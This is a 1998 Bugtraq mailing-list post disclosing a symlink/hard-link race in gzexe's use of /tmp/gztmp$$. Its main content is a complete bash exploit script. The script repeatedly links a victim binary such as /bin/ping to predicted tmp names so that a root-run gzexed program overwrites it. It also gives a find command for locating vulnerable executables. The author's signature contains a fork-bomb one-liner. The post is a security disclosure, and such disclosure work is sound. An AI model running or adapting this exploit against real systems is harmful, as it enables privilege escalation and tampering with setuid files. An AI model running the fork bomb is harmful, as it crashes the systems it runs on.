[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: GZEXE - the big problem
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf () BOSS ! STASZIC ! WAW ! PL>
Date: 1998-01-28 21:41:53
[Download RAW message or body]
** DESCRIPTION **
GZEXE, part of gzip package, is a small utility which allows
'transparent' compressio any kind of executables (just like pklite
under ms-dos). Unfortunatelly, it may be extremally dangerous. Here's
the shell script used to decompression:
if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
[...] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
/tmp/gztmp$$ ${1+"$@"}; res=$?
^^^^^^^^^^^^
Just look at this... An example of badly-written one ;) It's possible
to overwrite any file (including SUIDs!) with code of gzexed executable
when root executes it... Then, this unwanted suid may be easily exploited.
It's also possible to enforce execution of OUR OWN code instead of
gzexed program, just by choosing as a victim any file not owned by
user running vunerable executables, but writable by him/her. This
file (even setuid) may be freely modified by attacker... Whoops!
** EXPLOIT **
-- GZEXE EXPLOIT --
#!/bin/bash
# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
VICTIM=/bin/ping
GZEXED=a.out
# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut -f 1 -d " "
if [ ! -f $VICTIM ]; then
echo "I can't find my victim ($VICTIM)..."
exit 0
fi
ORIG=`ls -l $VICTIM|awk '{print \$5}'`
echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."
renice +20 $PPID >&/dev/null
cd /tmp
touch $GZEXED
while :; do
START=`ps|awk '$6=="ps"{print $1}'`
let START=START+100
let DO=START+100
while [ "$START" -lt "$DO" ]; do
ln $VICTIM gztmp$START &>/dev/null
let START=START+1
done
sleep 10
rm -f gztmp* &>/dev/null
NOWY=`ls -l $VICTIM|awk '{print \$5}'`
if [ ! "$ORIG" = "$NOWY" ]; then
echo "Done, my master."
exit 0
fi
done
-- EOF --
It may be left in background, just like my gcc-exploit-2. Please
verify vunerable executable filename (GZEXED - you may specify more
than one file, separated by spaces).
** FIX **
DO NOT USE GZEXE TO COMPRESS EXECUTABLES.
That's all, TMPDIR will NOT help in this case.
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
["gzexeploit" (application/octet-stream)]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic